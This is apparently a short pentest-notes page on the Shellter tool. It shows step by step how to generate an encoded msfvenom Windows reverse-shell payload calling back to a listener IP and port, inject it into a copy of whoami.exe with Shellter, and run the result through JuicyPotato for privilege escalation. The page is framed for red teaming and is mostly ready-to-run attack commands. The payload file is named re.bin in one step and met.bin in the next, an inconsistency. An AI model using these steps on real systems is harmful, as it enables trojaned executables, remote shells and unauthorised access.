Skip to main content

Shellter

Shellter is a dynamic shellcode injection tool, primarily used to inject payloads into Windows executables for red teaming and penetration testing.

Installation

sudo apt install shellter
dpkg --add-architecture i386
apt update && apt install wine32
shellter

Basic Usage

  1. Prepare your working directory and target executable:
cd ~/privesc/rs
cp ../bin/whoami.exe .
  1. Generate a payload (example: reverse shell) with msfvenom:
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.177 LPORT=444 -e x86/shikata_ga_nai -i 7 -f raw > re.bin
  1. Run Shellter and follow the prompts:
shellter
# Choose Operation Mode - Auto/Manual (A/M/H): A
# PE Target: /home/kali/privesc/rs/whoami.exe
# Enable Stealth Mode? (Y/N/H): N
# Use a listed payload or custom? (L/C/H): C
# Select Payload: /home/kali/privesc/rs/met.bin
# Is this payload a reflective DLL loader? (Y/N/H): N
  • Example: Using JuicyPotato for privilege escalation:
JuicyPotato.exe -t t -p whoami.exe -l 5837